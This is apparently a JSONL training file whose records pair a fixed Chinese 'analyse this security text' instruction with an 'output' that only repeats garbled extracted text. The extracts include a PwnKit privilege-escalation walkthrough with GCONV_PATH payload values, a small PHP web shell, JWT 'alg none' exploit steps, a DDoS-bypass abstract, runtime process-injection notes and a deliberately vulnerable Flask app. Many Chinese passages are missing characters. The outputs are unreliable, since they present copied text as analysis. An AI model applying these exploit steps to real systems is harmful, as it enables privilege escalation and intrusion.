 Barcodes that contain \"cat\"  All UPC barcodes  Specify action", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom flask import Flask, flash, get_flashed_messages, make_response, redirect, render_template_string, request from os import path, unlink from PIL import Image import tempfile app = Flask(__name__) app.secret_key = \"0123456789ABCDEF\" @app.route('/', methods=['GET', 'POST']) def upload_file(): if request.method == 'POST': file = request.files.get('image', None) if not file: flash('No image found') return redirect(request.url) filename = file.filename ext = path.splitext(filename)[1] if (ext not in ['.jpg', '.jpeg', '.png', '.gif', '.bmp']): flash('Invalid extension') return redirect(request.url) tmp = tempfile.mktemp(\"test\") img_path = \"{}.{}\".format(tmp, ext) file.save(img_path) img = Image.open(img_path) w, h = img.size ratio = 256.0 / max(w, h) resized_img = img.resize((int(w * ratio), int(h * ratio))) resized_img.save(img_path) r = make_response() r.data = open(img_path, \"rb\").read() r.headers['Content-Disposition'] = 'attachment; filename=resized_{}'.format(filename) unlink(img_path) return r return render_template_string(''' <!doctype html> <title>Image Resizer</title> <h1>Upload an Image to Resize</h1> {% with messages = get_flashed_messages() %} {% if messages %} <ul class=flashes> {% for message in messages %} <li>{{ message }}</li> {% endfor %} </ul> {% endif %} {% endwith %} <form method=post enctype=multipart/form-data> <p><input type=file name=image> <input type=submit value=Upload> </form> ''') if __name__ == '__main__': app.run(threaded=True, port=8000, host=\"0.0.0.0\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-OLON-QLPQ pkexec本身是来授权户以其他身份执程序他具备suid属性但由于常规功能下不持直接执 命令法利于suid提权 pkexec是polkit 默认安装的系统服务这个套件的程序 CVE-2021-3560 利的dbus-send这次是 CVE-2021-4034 利的 pkexec上次影响的<=0.113 版本这次影响全部版本 UbuntuDebianFedora 和 CentOS 等默认安装pkexec均受影响 暂时吧 pkexec --version查看版本 https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c 简单来讲就是越界读写导致不安全的环境变量写这种越界写允许我们重新引个 将不安 全环境变量例如 LD_PRELOAD放 pkexec 的 环境; 如果是正常设置环境变量这些不安全变 量通常会被删除通过 ld.so 如GCONV_PATH就是不安全的环境变量因为他会导致任意so执同时pkexec是个默认具有suid 属性的程序如果能让其执命令那么就能导致suid提权了 所以利中允许我们绕过过滤写GCONV_PATH然后设置gconv-modules件触发字符集转换 调iconv_open加载对应字符集的so件 漏洞介绍 漏洞影响 安全版本 漏洞分析 2 如下是pkexec的部分代码问题在于如果execve调pkexec时如果 args[] = {NULL} 传 到pkexec时argc=0但argv[]={NULL}这个时候argv会占个char字符 534for循环argc=0所以不会进循环但n已经设置成1 610argv[1]赋值给path execve调新进程的堆栈如下argv和envp是连续的这就会导致argv[1]=envp[0] 如果按照上的代码逻辑如果传的命令不是绝对路径就会在 PATH 环境变量的录搜索在赋 值回argv C 复制代码 435 main (int argc, char *argv[]) 436 { ... 534 for (n = 1; n < (guint) argc; n++) 535 { ... 568 } ... 610 path = g_strdup (argv[n]); ... 629 if (path[0] != '/') 630 { ... 632 s = g_find_program_in_path (path); ... 639 argv[n] = path = s; 640 } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 3 如我调execve时将环境变量设置成 610path = 'pwnkit.so:.' 632s = 'GCONV_PATH=./pwnkit.so:.' 这说明下因为PATH=xxx设置个新的搜索录我只需要创建个名 为'GCONV_PATH=.'的录并在该录下创建任意个叫'pwnkit.so:.'的程序即可通过 g_find_program_in_path(path) 搜索到该件 639argv[1] = envp[0] = 'GCONV_PATH=./pwnkit.so:.' 到此为我们就顺利的将GCONV_PATH写到环境变量中绕过过滤了注意这要的是 : 后 的 . 于加载当前录下的gconv-modules前pwnkit.so叫啥都 接下来的作就是怎么触发iconv_open调以及iconv_open的利链构造 在pkexec调g_printerr打印错误志时如果CHARSET设置成UTF-8的其他字符集CHARSET不 是敏感变量不会被过滤就会触发iconv_open调 argv[0] \"program\" argv[1] \"option\"  argv[argc] NULL envp[0] \"value\" envp[1] \"PATH=name\"  envp[envc] NULL C 复制代码 envp[0] = 'pwnkit.so:.' envp[1] = 'PATH=GCONV_PATH=.' 1 2 4 来看下iconv_open函数的执过程 1. iconv_open函数先会找到系统提供的gconv-modules件这个件中包含了各个字符集的相关 信息存储的路径每个字符集的相关信息存储在个.so件中即gconv-modules件提供了各 个字符集的.so件所在位置 2. 然后再根据gconv-modules件的指示去链接参数对应的.so件 3. 之后会调.so件中的gconv()与gonv_init()函数 4. 然后就是些与本漏洞利关的步骤 linux系统提供了个环境变量GCONV_P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### DES基本介绍 Data Encryption Standard(DES)数据加密标准是典型的块加密其基本信息如下 - 输入 64 位 - 输出 64 位 - 密钥 64 位使用 64 位密钥中的 56 位剩余的 8 位要么丢弃要么作为奇偶校验位 - Feistel 迭代结构 - 明文经过 16 轮迭代得到密文 - 密文经过类似的 16 轮迭代得到明文 ### DES加密流程 我们可以考虑一下每一轮的加密过程 $L_{i+1}=R_i$ $R_{i+1}=L_i\\oplus F(R_i,K_i)$ 那么在最后的 Permutation 之前对应的密文为$(R_{n+1},L_{n+1})$ ### DES解密流程 那么解密如何解密呢首先我们可以把密文先进行逆置换那么就可以得到最后一轮的输出我们这时考虑每一轮 $R_i=L_{i+1}$ $L_i=R_{i+1}\\oplus F(L_{i+1},K_i)$ 因此$(L_0,R_0)$ 就是加密时第一次置换后的明文我们只需要再执行逆置换就可以获得明文了 可以看出DES 加解密使用同一套逻辑只是密钥使用的顺序不一致 ### DES核心部件 DES 中的核心部件主要包括这里只给出加密过程的 - 初始置换 - F 函数 - E 扩展函数 - S 盒设计标准未给出 - P 置换 - 最后置换 如果对 DES 更加感兴趣可以进行更加仔细地研究欢迎提供 PR ### DES衍生 在 DES 的基础上衍生了以下两种加密方式 - 双重 DES - 三种 DES ### 双重 DES介绍 双重 DES 使用两个密钥长度为 112 比特加密方式如下 $C=E_{k2}(E_{k1}(P))$ 但是双重 DES 不能抵抗中间相遇攻击我们可以构造如下两个集合 $I={E_{k1}(P)}$ $J=D_{k2}(C)$ 即分别枚举 K1 和 K2 分别对 P 进行加密和对 C 进行解密 在我们对 P 进行加密完毕后可以对加密结果进行排序这样的复杂度为$2nlog(2n)=O(n2n)$ 当我们对 C 进行解密时可以每解密一个就去对应的表中查询 总的复杂度为还是$O(n2n)$ ### 三重 DES介绍 三重 DES 的加解密方式如下 $C=E_{k3}(D_{k2}(E_{k1}(P)))$ $P=D_{k1}(E_{k2}(D_{k3}(C)))$ 在选择密钥时可以有两种方法 - 3 个不同的密钥k1k2k3 互相独立一共 168 比特 - 2 个不同的密钥k1 与 k2 独立k3=k1112 比特 ### DES攻击方法分类 - 差分攻击 - 线性攻击", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing HTML5 DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA 02155 mchow@cs.tuCs.edu What is HTML5?  The next major revision of HTML. To replace XHTML? Yes  Close enough to a full-fledged development environment  The three aspects of HTML5:  Content (HTML)  PresentaYon of content (CSS)  InteracYon with content (JavaScript)  S\"ll work in progress  Backing from Google, MicrosoC, and of course Apple  Currently supported (not 100%) in Chrome, Firefox 3.5+, Opera, Internet Explorer 8, and Safari  Many incompaYbiliYes exist; perform a browser test via hdp://www.html5test.com  Will be flexible with error handling (i.e., incorrect syntax). Older browsers will safely ignore the new HTML5 syntax. HTML5: Whats In? Whats Out?  In:  New tags, including <button>, <video>, <audio>, <article>, <footer>, <nav>  New adributes for tags such as autocomplete, autofocus, pattern (yes, regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and Yme  GeolocaYon  New selectors  Client-side storage including localStorage, sessionStorage, and Web SQL  Out:  PresentaYon elements such as <font>, <center>  PresentaYon adributes including align, border  <frame>, <frameset>  <applet>  Old special effects: <marquee>, <bgsound>  <noscript> Quick Demos  Video capYoning  Canvas  GeolocaYon Structure of an HTML5 Document <!DOCTYPE html> <html> <head> <title>An HTML Document</title> ... ... ... </head> <body> <p>Everything that you practically know of stays the same</p> ... ... </body> </html> Areas of Concern  The adack surface: client-side  Client-side and offline storage  No longer just cookies and sessions  Compared to cookies and sessions, allows for greater amount of data to be stored  What if client's database synchronizes with producYon database on server and client's database contains malicious?  Cross-origin JavaScript requests  Sending messages from one document to another (on another domain)  Holy smokes, backgro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n浅谈 PHP WebShell 的检测与防御 最近腾讯举办的个webshell挑战赛简单玩了下发现些绕过的思路对于很多检测产品 都是通的说明这些产品在遇到的些共性的检测难点上都没有个很好的解决案以下 简单分析下webshell检测的原理和困境以及些绕过的思路 正则识别 pass ssdeep 通过模糊哈希匹配已知样本可以允许定范围内的修改原理是分分别计算哈希连接后 得到字符串较时计算两个字符串的加权编辑距离评估样本的相似度加权编辑距离指 个字符串最少经过多少次操作(增加删除修改交换)得到另个字符串不同的操作对应 不同的权值结果相加 ssdeep只能针对已知样本且没有范围修改的情况且当样本量增加时较操作的计算 量也会随之增加ssdeep在恶意软件检测中有较多的应但是针对webshell局限性较 明显途有限 静态分析 基本相当于盒扫描静态分析主要流程般为词法分析语法分析污点分析 词法分析(Lexical Analysis) 词法分析将字符序列转换为记号token序列的过程词法只识别语素不关号之间的 关系(如括号是否匹配) 直观的例就是语法亮每个不同颜的块就是个tokenphp本身提供了个 token_get_all 和 PhpToken::tokenize 法将php源码转换成token数组 个demo程序 解析出的token流 <?php $cmd = $_GET[\"cmd\"]; $f = $_GET['f']; if ($f == \"eval\") { exit(\"denied\"); } $f($cmd); T_OPEN_TAG: '<?php\\n' T_WHITESPACE: '\\n' T_VARIABLE: '$cmd' T_WHITESPACE: ' ' CHARACTOR = T_WHITESPACE: ' ' T_VARIABLE: '$_GET' CHARACTOR [ T_CONSTANT_ENCAPSED_STRING: '\"cmd\"' CHARACTOR ] CHARACTOR ; T_WHITESPACE: '\\n\\n' T_VARIABLE: '$f' T_WHITESPACE: ' ' CHARACTOR = T_WHITESPACE: ' ' T_VARIABLE: '$_GET' CHARACTOR [ T_CONSTANT_ENCAPSED_STRING: ''f'' CHARACTOR ] CHARACTOR ; T_WHITESPACE: '\\n\\n //.... 语法分析(Parsing) 语法分析是以词法分析结果(token 流)为输进语法检查分析语法结构构建中间语 的过程般来说中间语有多种不同的表达形式如抽象语法树三地址码静态单赋值 形式 抽象语法树 抽象语法树般是语法分析的第步中间结果他的每个节点代表个运算符该节点的节 点代表这个运算符的运算分量 ** 具 **可以使PHP-Parser将php代码转为AST从php 7开始本身内部也会成AST 可以使php-ast扩展将内部的AST导出 <?php $cmd = $_GET[\"cmd\"]; $f = $_GET['f']; if ($f == \"eval\") { exit(\"denied\"); } $f($cmd); 静态单赋值形式(Static Single-assignment Form) 与控制流图Control Flow Graph AST虽然较直观但是并不适合直接来进污染传播分析般还需要转成静态单赋值形 式的控制流图静态单赋值也是种编译过程的中间语他的特点是每个变量都只被赋值 次控制流图是由基本块和有向边组成的图每个基本块内部都是顺序的执语句有向边表 示节点直接的控制流路径例如下的例 成的CFG如下 <?php $cmd = $_GET[\"cmd\"]; $f = $_GET['f']; if ($f == \"eval\") { $cmd = \"exit('denied')\"; } $f($cmd); ** 具 **可以使php-cfg项将php代码成SSA形式的CFG此外可以使vld项将 php内部的opcode导出不过opcode不是SSA形式的需要做个简单的转化 静态分析的缺陷 因为php动态弱类型的特性灵活度极单纯静态分析漏报的可能性很最简单的例 如 静态分析法获取 $a 的内容所以不能判断第三具体执了哪个函数也就从检测了 所以般情况下webshell检测还需要结合动态分析 动态分析 动态分析般通过hook关键操作与函数的式构造个沙箱的环境直接执样本执过 程中可以对污点传播进跟踪当污点传播到敏感函数时即可判断漏洞存在类似IAST 此外还可以结合静态分析的结果例如下例中静态分析发现test函数是sink点但是找 不到调信息动", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMalicious Encrypted Traffic Detection HITCON CMT 2018 Aragorn aragorn51882@gmail.com About Me  Aragorn /  Master of National Taiwan university  Security consultant in Somewhere  NTUCSA ()  Malware AnalysisOperating Facebook fan page Packet ForensicPenetration Test  Speaker  2016 TANET Network Technology Promotion Seminar - Hacker Attack Techniques: APT Attack & Ransomware Introduction 1 HTTPS Encrypted Traffic  Since the end of 2016, Google and Mozilla have released statistics, and more than half of their browser users have used HTTPS protocol encryption https://transparencyreport.google.com/https/overview?hl=en https://letsencrypt.org/stats/ 2 HTTPS Encrypted Traffic(cont)  In March of this year, Cisco's latest survey found that HTTPS traffic reached 50% in October 2017, compared with only 38% of the overall in November 2016, the usage rate can be said to increase significantly.  NSS Labs predict that there will be 3/4 of the network traffic in 2019, and encryption will be used. 3 Malicious Encrypted Traffic  According to Cisco's sampling, the proportion of malware that communicated via TLS encrypted connections was 2.21% in 2015, and increased to 21.44% in May 2017.  10-12% of all Malware uses HTTPS  https://blogs.cisco.com/security/malwares-use-of-tls-and-encryption (Jan 2016)  37% of all Malware uses HTTPS  https://blog.cyren.com/articles/over-one-third-of-malware-uses-https (June 2017)  From all HTTPS malware, 97% uses port 443, and 87% uses TLS  In addition to TLS, SSL encryption, and technologies such as VPN, I2P, and Tor encryption, network security is facing great challenges. 4 Malicious Encrypted Traffic  Exploit kits  using SSL/TLS-enabled advertising networks injects malicious scripts into legitimate websites  Malware  Adware  Malware callbacks 5 60% 25% 12% 3% Banking Trojan Ransomware Infostealer Trojan Other Source : ZSCALER Malware with Encrypted Traffic Name Type Gamarue/Andromeda Modular botnet Sality File infecter, modular botnet Necurs Informatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 快速配置 第一步安装**git bash** ``` https://git-scm.com/download/win ``` 第二步安装**node.js** ``` https://nodejs.org/dist/v6.10.3/node-v6.10.3-x64.msi ``` 第三步安装**npm** ``` npm install -g cnpm --registry=https://registry.npm.taobao.org ``` 第四步安装**react** ``` npm install -g create-react-app ``` 第五步安装插件 **axios**ajax ``` npm install axios --save ``` **react-router-dom**路由库 ``` npm install react-router-dom --save ``` **jquery**JS工具库 ``` npm install jquery --save ``` **bootstrap**前端开发框架 ``` npm install bootstrap --save ``` **moment**JS日期处理库 ``` npm install moment --save ``` **prop-types**React组件属性类型校验 ``` npm install prop-types --save ``` **react-addons-css-transition-group**react-router过渡动画 ``` npm install react-addons-css-transition-group --save ``` **Material-UI**react UI库 ``` npm install material-ui react-tap-event-plugin --save ``` **ANT Desgin**阿里UI ``` npm install antd --save ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNew Memory Forensics Techniques to Defeat Device Monitoring Malware Andrew Case, Gustavo Moreira, Austin Sellers, Golden G. Richard III andrew@dfir.org, gmoreira@volexity.com, asellers@volexity.com, golden@cct.lsu.edu April 4, 2022 1 Introduction Malware that is capable of monitoring hardware devices poses a significant threat to the privacy and security of users and organizations. Common capabilities of such malware include keystroke logging, clipboard monitoring, sampling of microphone audio, and recording of web camera footage. All modern operating systems implement APIs that provide this hardware access and all of them have been abused by numerous malware samples to monitor the activity of journalists and dissidents, conduct espionage operations against corporate and government targets, and gather data that allows for blackmail of individuals. Existing methods for detecting these malware techniques are largely confined to malware that operates within kernel space, commonly referred to as kernel rootkits. The use of such rootkits has waned in recent years as operating system vendors have sharply locked down access to kernel memory. This includes enforcement of driver signing, limiting which organizations can receive signing certificates, and adding proactive monitoring systems within the operating system that detect common rootkit tampering techniques. These limitations placed upon kernel rootkits as well as the easy-to-use APIs in userland that allow for access to hardware devices has led to a significant number of device monitoring malware samples that operate solely within process memory. Such malware is comparatively much simpler to write and is also much easier to make portable across a wide variety of operating system versions. Unfortunately, current methods for direct detection of such userland malware are severely outdated or completely lacking. These include attempts at live forensics, which relies on system APIs to enumerate artifacts, but these APIs ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking The Future: Weaponizing the Next Generation James Arlen, Leigh Honeywell, James Costello, Tiffany Rad, Tim Krabec DEF CON 18 - Las Vegas Disclaimer We've got jobs and stuff. This is not our job. Mostly, the lovely people we work for don't talk like this. We do sometimes because it's the right thing to do. Therefore, what we're saying is **all** us and not them. If you need to find someone to blame, it's just us, except if it's the voices in your own head - that's **all** you. Also, there are no spiders or clowns in the presentation, in case you were worried. The Panel Leigh Honeywell jane of many trades security consultant finishing up a degree at the University of Toronto co-founder and director of HackLab.TO hackerspace on the board of advisors of the SECtor conference Google Summer of Code mentor avid cyclist book nerd traveler Honorary Aunt to many Tiffany Strauchs Rad, MA, MBA, JD lawyer hacker college professor presents at Black Hat USA, DEFCON, Hackers on Planet Earth, Hacking at Random, and Pumpcon likes cars and hacks them building school-integrated hackerspaces Mom James Arlen, CISA Best summary ever: Infosec Geek Hacker Social Activist Author Speaker Parent Dad James Costello, CISSP How do you follow the best summary ever: Geek - Infosec and otherwise Repurposer/Hacker Blogger Pop Culture Referencer Secretary and VP of Affiliate Relations for CCCKC Board Member for Cyber-RAID and B-SidesKC Occassional Speaker British TV junkie SciFi Fan and aspiring writer Parent Dad Tim Krabec Geek. Infosec & General Active with ISSA & ASIS chapter 254. Husand Insane parent: former foster parent (40 children+) Father of 4 children with the 5th on the way. Actual Red team member (finally) Socratic Blogger & Pod caster Hacker The Topics From the DEF CON 18 CFP Response - What if you are not the breeder type - making your home a micro-hackerspace when there isn't a community - making smart kids through failure / anti- helicopter parenting - parent's view of how to e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKill 'em All -- DDoS Protection Total Annihilation! Tony T.N. Miu1, W.L. Lee2, Alan K.L. Chung2, Daniel X.P. Luo2, Albert K.T. Hui2, and Judy W.S. Wong2 1Nexusguard Limited tony.miu@nexusguard.com 2Network Threats Information Sharing and Analysis Center (NT-ISAC) Bloodspear Labs {leng,alan,daniel,albert,judy}@bloodspear.org Abstract. With the advent of paid DDoS protection in the forms of CleanPipe, CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors... or so they think! We're here to rip apart this false sense of security by dissecting each and every mitigation techniques you can buy today, showing you in clinical details how exactly they work and how they can be defeated. Essentially we developed a 3-fold attack methodology: 1. stay just below red-flag rate threshold, 2. mask our attack traffics inconspicuous, 3. emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges, 4. ??? 5. PROFIT! We will explain all the required look-innocent headers, TCP / HTTP challenge- response handshakes,JS auth bypass, etc. etc. in meticulous details. With that knowledge you too can be a DDoS ninja! Our PoC attack tool \"Kill-em-All\" will then be introduced as a platform to put what you've learned into practice, empowering you to bypass all DDoS mitigation layers and get straight through to the backend where havoc could be wrought. Oh and for the skeptics among you, we'll be showing testing results against specific products and services. Keywords: DDoS mitigation, DDoS, large-scale network attack 1 Introduction DDoS attacks remain a major threat to internet security because they are relatively cheap yet highly effective in taking down otherwise well-protected networks. One need look no further than the attack on Spamhaus to realize the damage potential  bandwidth clog peaked at 300Gbps, all from a mere 750Mbps generated attack traffic [1]! In the following sections, we first examine DDoS ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JWT Vulnerabilities ## Introduction JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. ## How to exploit 1. Modify the algorithm to \"none\" algorithm ``` { \"alg\": \"none\", \"typ\": \"JWT\" } ``` 2. Modify the algorithm RS256 to HS256 If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature. 3. Bruteforce HS256 the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code. ## Tools * [jwt-hack](https://github.com/hahwul/jwt-hack) ## Reference - [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH \"ping\" \"8\" \"2016年11月10日\" \"iputils-161105\" \"系统管理员手册iptuils\" .SH 名称 ping \\- 向网络主机发送 ICMP 回显请求ECHO_REQUEST分组 .SH 概要 \\fBping\\fR [\\fB-aAbBdDfhLnOqrRUvV46\\fR] [\\fB-c \\fIcount\\fB\\fR] [\\fB-F \\fIflowlabel\\fB\\fR] [\\fB-i \\fIinterval\\fB\\fR] [\\fB-I \\fIinterface\\fB\\fR] [\\fB-l \\fIpreload\\fB\\fR] [\\fB-m \\fImark\\fB\\fR] [\\fB-M \\fIpmtudisc_option\\fB\\fR] [\\fB-N \\fInodeinfo_option\\fB\\fR] [\\fB-w \\fIdeadline\\fB\\fR] [\\fB-W \\fItimeout\\fB\\fR] [\\fB-p \\fIpattern\\fB\\fR] [\\fB-Q \\fItos\\fB\\fR] [\\fB-s \\fIpacketsize\\fB\\fR] [\\fB-S \\fIsndbuf\\fB\\fR] [\\fB-t \\fIttl\\fB\\fR] [\\fB-T \\fItimestamp option\\fB\\fR] [\\fB\\fIhop\\fB\\fR\\fI ...\\fR] \\fB\\fIdestination\\fB\\fR .SH \"描述\" .PP \\fBping\\fR 使用 ICMP 协议规定的 ECHO_REQUEST 数据报引发一个来自主机或网管的 ICMP ECHO_RESPONSE 回应 ECHO_REQUEST 数据报ping信息有一个 IP 和 ICMP 头部 其后跟随了一个结构包含一个时间相关的值以及一个任意的pad 字节的随机数用以填充数据包 .PP \\fBping\\fR可以同时在 IPv4 和 IPv6 下工作 如需明确强制指定使用其中某个可以使用 \\fB-4\\fR 或者 \\fB-6\\fR .PP \\fBping\\fR 还可以发送 IPv6 节点信息查询Node Information Quries, RFC4620 中间节点\\fIhop\\fR可能不被允许因为 IPv6 源路由已不赞成使用RFC5095 .SH \"选项\" .TP \\fB-4\\fR 仅使用 IPv4 .TP \\fB-6\\fR 仅使用 IPv6 .TP \\fB-a\\fR Audible ping. .TP \\fB-A\\fR 自适应 ping .TP \\fB-b\\fR 允许对一个广播地址进行 ping .TP \\fB-t \\fIttl\\fB\\fR 仅进行\\fBping\\fR 设置 IP 的 TTLTime to Live .TP \\fB-T \\fItimestamp option\\fB\\fR 设置特殊的 IP 时间戳选项 \\fItimestamp option\\fR 可以是 \\fItsonly\\fR仅时间戳 \\fItsandaddr\\fR时间戳和地址或者 \\fItsprespec host1 [host2 [host3 [host4]]]\\fR预先指定跳数的时间戳 .TP \\fB-U\\fR 打印完整的用户到用户的延迟旧行为通常情况下 \\fBping\\fR 打印网络往返延时它们可能不同例如在 DNS 解析出现失败时 .TP \\fB-v\\fR 输出详细信息 .TP \\fB-V\\fR 显示版本并退出 .TP .B -c .I count 在发送(和接收)了正好数量为 .I count 的回显应答分组后停止操作在发送了 .I count 个分组后没有收到任何分组的特别情况是发送导致了终止(选程主机或网关不可达) .TP \\fB-d\\fR 在所用的套接字上使用 SO_DEBUG 选项 实际上这个套接字选项没有被 Linux 内核所使用 .TP \\fB-D\\fR 在每行之前打印时间戳UNIX 时间 + gettimeofday 中的毫秒 .TP \\fB-f\\fR 以高速洪水方式进行 ping 以分组返回的速度来输出其它分组或每秒输出百次当收到每个回显应答并打印一个退格符时对每个回显请求都打印一个句点``.''这可以快速显示出丢弃了多少个分组只有超级用户可以用这个选项这操作对网络要求非常苛刻应该慎重使用 .TP .B -i .I wait 在发送每个分组时等待 .I wait 个秒数缺省值为每个分组等待一秒此选项与-f选项不能同时使用 .TP .B -l .I preload 如果指定 .I preload 那么 .B ping 程序在开始正常运行模式前尽可能快地发送分组同样只有超级用户可以用这个选项 .TP .B -n 只以数字形式输出信息这样", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" (c) 2000 by Michael Kerrisk (michael.kerrisk@gmx.net) .\\\" .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" License. .\\\" Created, 14 Dec 2000 by Michael Kerrisk .\\\" .TH DIRNAME 3 2000-12-14 \"GNU\" \"Linux Programmer's Manual\" .SH NAME dirname, basename \\- 解析路径组成部分 .SH \"总览\" .nf .B #include <libgen.h> .sp .BI \"char *dirname(char \" \"*path\" \");\" .BI \"char *basename(char \" \"*path\" \");\" .fi .SH \"描述\" .B dirname 和 .B basename 把 以 null 结尾 的 路径名 分解为 目录 和 文件名. 一般情况下, .B dirname 返回 路径名 的 前面部分, 直到 (但不包括) 最后一个 '/', 而 .B basename 则 返回 最后一个 '/' 后面 的 内容. 如果 路径名 以 '/' 结尾, 该 '/' 被认为 不是 路径名 的 一部分. .PP 如果 路径名 .I path 不包含 斜杠 '/', .B dirname 返回 字符串 \".\", 而 .B basename 返回 .IR path 的 副本. 如果 路径名 .I path 是 \"/\", 则 .B dirname 和 .B basename 均 返回 \"/\". 如果 路径名 .I path 是 NULL 指针 或 指向 空串, 则 .B dirname 和 .B basename 均 返回 \".\". .PP 把 .BR dirname 返回的 字符串, \"/\", 和 .B basename 返回的 字符串 连接 起来, 能够 产生 一个 完整 的 路径名. .PP 无论 .B dirname 还是 .B basename 都 有可能 更改 .IR path 的 内容, 因此 如果 需要 保护 原有 路径名, 应该 传送 副本 作为 参数. 此外, .B dirname 和 .B basename 返回的 指针 可能 指向 一块 静态分配 的 内存, 会被 下次 调用 覆盖. .PP 下面 的 例子 (摘自 SUSv2) 展示了 对于 不同的 路径名, .B dirname 和 .B basename 返回 的 字符串: .sp .nf .B path dirname basename \"/usr/lib\" \"/usr\" \"lib\" \"/usr/\" \"/\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRuntime Process Insemination Shawn lattera Webb SoldierX https://www.soldierx.com/ Who Am I?  Just another blogger  Professional Security Analyst  Twelve-year C89 programmer  Member of SoldierX, BinRev, and Hack3r Disclaimers  Opinions/views expressed here are mine, not my employers  Talk is semi-random  Tied together at the end  Almost nothing new explained  Theory known  New technique  Presentation and tools only for educational purposes Assumptions  Linux? What's that?  Concepts carry over to Windows and OSX  Basic knowledge of C and 32bit Linux memory management  Ability and desire to think abstractly  Non-modified memory layout (NO grsec/pax) History  CGI/Web App vulnerabilities  Needed connect-back shellcode  Needed reliable, random access  Firewall holes are a problem  Needed way to reuse existing connection to web server  Needed to covertly sniff traffic  Libhijack is born (discussed later) Setting the Stage  Got a shell via CGI/Web App exploit  Reliable way to get back in  Apache good candidate  Already listening for connections  Modify apache process somehow to run a shell when a special string is sent  i.e. GET /shell HTTP/1.1 $ whoami apache  Need to hook certain functions in runtime Current Techniques  Store shellcode on the stack  Stack is non-executable  Store shellcode at $eip  Mucks up original code  Store shellcode on the heap  Heap is non-executable  LD_PRELOAD?  Process has already started Process Loading  execve is called  Kernel checks file existence, permissions, etc.  Kernel loads RTLD (Runtime Linker (ld.elf.so))  Kernel loads process meta-data, initializes stack  Meta-data loaded at 0x08048000 on Intel 32bit Linux Runtime Linker  Loads process into memory  Loads dependencies (shared objects)  DT_NEEDED entries in the .dynamic section  Patches PLT/GOT for needed dynamic functions  Calls initialization routines  Finally calls main() ELF  Executable and Linkable Format  PE-COFF based on ELF  Meta-data  Tells RTLD what to load and how to load i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nly.tl/poker Elie Bursztein Celine Bursztein Jean Michel Picod ly.tl/poker Spectre ly.tl/poker Inception ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker Device ly.tl/poker ly.tl/poker ly.tl/poker Visible differences Galaxy Core Poker cheating device ly.tl/poker Security measures ADB / debug mode gone No easy way to get the APK / analyze what is happening Screenshot shortcut disabled & framebuffer owned by root Prevent to do screenshot / screencap either via SSH or UI Activation code sent separately Prevent activation of a lost device ly.tl/poker Fun facts Cheating hardware hidden from the UI/system No way to trigger the system without the correct application / setup Backdoor? No need for network or SIM Lots of phone home code in the APK and lot of weird APK in the phone Custom rom with custom kernel Chinese 4.2.2 Jelly Bean ROM AOSP ly.tl/poker The app App walkthrough Casino royale ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker Number of players Result Feedback device Game type in use Cards as seen by camera face down Up Down ly.tl/poker Fun facts Super user password hard coded in string file... The app has a super user password that allows access on any devices Most of the interesting features are in a kernel module Remote devices control and cards recognition handled by a kernel module App(s) not obfuscated Easy to read as 123 if you know Java :) ly.tl/poker Basic principle How does this thing work anyway?? Underlying principle The World Is Not Enough ly.tl/poker ly.tl/poker Phone B&W camera IR LEDs IR passband plastic housing IR illumination ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker 